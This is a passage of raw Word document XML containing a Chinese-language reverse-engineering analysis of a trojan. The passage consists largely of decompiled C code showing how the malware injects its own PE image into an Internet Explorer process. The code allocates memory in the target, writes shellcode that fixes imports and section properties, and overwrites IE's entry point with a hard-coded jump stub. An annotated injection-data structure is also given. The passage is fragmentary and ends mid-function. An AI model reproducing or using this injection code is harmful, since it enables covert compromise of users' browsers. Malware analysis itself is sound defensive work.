    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">        VirtualProtectEx(hProcess, ieentry, 0xCu, 0x40u, &amp;oldpro);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006444C6" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">        WriteProcessMemory(hProcess, ieentry, &amp;jmpshell, 0xCu, &amp;NumberOfBytesWrittena);</w:t>
      </w:r>
      <w:r w:rsidR="006444C6">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="006444C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改写</w:t>
      </w:r>
      <w:r w:rsidR="006444C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidR="006444C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点</w:t>
      </w:r>
      <w:r w:rsidR="00315423">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC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                      //jmpshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬编码以下指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sizeof=0x0C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:r>
        <w:t xml:space="preserve">                                                // +00 0xBF            mov edi, ie_inject_f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:r>
        <w:t xml:space="preserve">                                                // +01 ie_inject_f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:r>
        <w:t xml:space="preserve">                                                // +05 0x68            push ie_inject_d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:r>
        <w:t xml:space="preserve">                                                // +06 ie_inejct_d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:r>
        <w:t xml:space="preserve">                                                // +0A 0xFF            call edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D08CC" w:rsidRDefault="006D08CC" w:rsidP="006D08CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                // +0B 0xD7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">        VirtualProtectEx(hProcess, ieentry, 0xCu, oldpro, &amp;oldpro);// </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  return v9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRPr="0091775D" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="00836EAC"/>
    <w:p w:rsidR="00C8389D" w:rsidRDefault="005251B2" w:rsidP="00C8389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将自身的木马种植到目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程，</w:t>
      </w:r>
      <w:r>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">LONGLONG __stdcall </w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>Modify</w:t>
      </w:r>
      <w:r>
        <w:t>Ie(HANDLE hProcess, BYTE *injectdata, int injectlen)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  v19 = 0x10000000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  optheader = (IMAGE_OPTIONAL_HEADER32 *)validate_getoptionheader((int)injectdata, injectlen);</w:t>
      </w:r>
      <w:r w:rsidR="003D333F">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="003D333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r w:rsidR="003D333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidR="003D333F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  if ( !optheader )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    goto LABEL_18;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  imagebase = optheader-&gt;ImageBase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  imagesize = optheader-&gt;SizeOfImage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  do                 // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidR="00624FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00245197">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自身进程和</w:t>
      </w:r>
      <w:r w:rsidR="00624FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidR="00624FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小的</w:t>
      </w:r>
      <w:r w:rsidR="007667FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    v19 += 0x10000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    lpAddress = (LPVOID)(v19 + imagebase);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    injectbase = VirtualAlloc((LPVOID)(v19 + imagebase), imagesize, 0x3000u, 0x40u);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    if ( injectbase )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">      VirtualFree(injectbase, 0, 0x8000u);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">      injectbase = VirtualAllocEx(hProcess, lpAddress, imagesize, 0x3000u, 0x40u);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  while ( v19 &lt; 0x30000000 &amp;&amp; !injectbase );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  if ( injectbase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8171D" w:rsidRDefault="00482B4A" w:rsidP="00C8171D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidR="00C8171D">
        <w:t>ConstructPe</w:t>
      </w:r>
      <w:r>
        <w:t>(hProcess, injectbase, injectdata, injectlen, &amp;inject_d, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00C8171D" w:rsidP="00C8171D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文件内嵌的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新构造重定位表、导入表以及各个节，</w:t>
      </w:r>
      <w:r>
        <w:t>内嵌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见③</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; WriteProcessMemory(hProcess, injectbase, (LPCVOID)inject_d.ImageBase, inject_d.ImageSize, 0)// 0xD000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; (len1 = getshellcodelen((unsigned __int8 *)FixImportTable),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        (v5 = (int (__stdcall *)(_DWORD, int, int, INJECTSTR *))AllocMemoryforShellCode(hProcess, FixImportTable, len1)) != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; (inject_d.FixImportTable = v5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        len2 = getshellcodelen((unsigned __int8 *)setsegproperty),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        (v7 = (int (__stdcall *)(DWORD))AllocMemoryforShellCode(hProcess, setsegproperty, len2)) != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; (inject_d.SetSegProperty = v7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.LdrLoadDll = (FARPROC)LdrLoadDll,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.LdrGetDllHandle = (FARPROC)LdrGetDllHandle,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.LdrGetProcedureAddress = (FARPROC)LdrGetProcedureAddress,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.RtlInitString = (FARPROC)RtlInitString,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        inject_d.RtlAnsiStringToUnicodeString = (FARPROC)RtlAnsiStringToUnicodeString,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.RtlFreeUnicodeString = (FARPROC)RtlFreeUnicodeString,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.ZwProtectVirtualMemory = (FARPROC)ZwProtectVirtualMemory,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        inject_d.ZwDelayExecution = (FARPROC)ZwDelayExecution,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        a = GetModuleFileNameA(0, inject_d.ImagePath, 0x104u),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        makecstring((BYTE *)inject_d.ImagePath, a),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        len3 = getshellcodelen((unsigned __int8 *)</w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:t>ieentry),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">        (v9 = AllocMemoryforShellCode(hProcess, </w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:t>ieentry, len3)) != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; (v13 = (unsigned int)v9, (v10 = AllocMemoryforShellCode(hProcess, &amp;inject_d, 0x138u)) != 0) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    result = __PAIR__((unsigned int)v10, v13);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t>LABEL_18:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">    result = 0i64;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00482B4A" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t xml:space="preserve">  return result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8389D" w:rsidRDefault="00482B4A" w:rsidP="00482B4A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="00482B4A"/>
    <w:p w:rsidR="005251B2" w:rsidRPr="00836EAC" w:rsidRDefault="005251B2" w:rsidP="005251B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写入的数据</w:t>
      </w:r>
      <w:r w:rsidRPr="005251B2">
        <w:t>ie_inject_d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t xml:space="preserve">00000000 INJECTSTR       struc ; (sizeof=0x138, mappedto_37) ; XREF: </w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>Modify</w:t>
      </w:r>
      <w:r>
        <w:t>Ie/r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>00000000 ImageBase       dd ?</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入木马的基址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>00000004 ImageEntry      dd ?</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入木马的入口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000008 ImageSize       dd ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>0000000</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:t>C FixImportTable  dd ?         //</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于修复导入表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F0761" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010 SetSegProperty  dd ?        </w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于修复</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000014 LdrLoadDll      dd ?                    ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000018 LdrGetDllHandle dd ?                    ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>0000001C LdrGetProcedureAddress dd ?             ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000020 RtlInitString   dd ?                    ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000024 RtlAnsiStringToUnicodeString dd ?       ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000028 RtlFreeUnicodeString dd ?               ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>0000002C ZwProtectVirtualMemory dd ?             ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000030 ZwDelayExecution dd ?                   ; offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>00000034 ImagePath       db 260 dup(?)</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="003F0761">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>母程序路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D71" w:rsidRDefault="005251B2" w:rsidP="005251B2">
      <w:r>
        <w:t>00000138 INJECTSTR       ends</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005251B2" w:rsidRDefault="005251B2" w:rsidP="005251B2"/>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="005251B2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ie_inject_f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数仍然是修复</w:t>
      </w:r>
      <w:r w:rsidR="006246DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">void __cdecl </w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:t>ieentry(INJECTSTR *injectdata)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">  v1 = __readeflags();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">  v6 = v1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
